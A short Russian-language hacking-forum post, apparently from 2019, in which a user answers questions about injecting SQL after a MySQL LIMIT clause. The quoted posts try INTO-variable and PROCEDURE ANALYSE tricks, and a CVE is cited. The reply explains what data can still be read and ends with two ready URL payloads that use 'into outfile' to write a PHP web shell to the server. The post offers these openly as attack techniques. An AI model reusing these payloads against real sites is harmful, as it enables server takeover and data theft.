12.02.2019, 03:26
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от giloo
↑
Нашла еще способ инъекции:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO @var1,@var2
Но кроме переменных ничего невозможно вставить(
Так не хочет:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2
Есть идеи у кого-нибудь?
INTO - https://dev.mysql.com/doc/refman/8.0...lect-into.html
Сообщение от giloo
↑
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить
DoS Bug - https://nvd.nist.gov/vuln/detail/CVE-2015-4870
Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!
Если у пользователя есть права на запись в фс пробуйте:
Код:
?q=1 into outfile '/path/to/shell.php' lines terminated by ""--+
?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by ""--+
|
|
|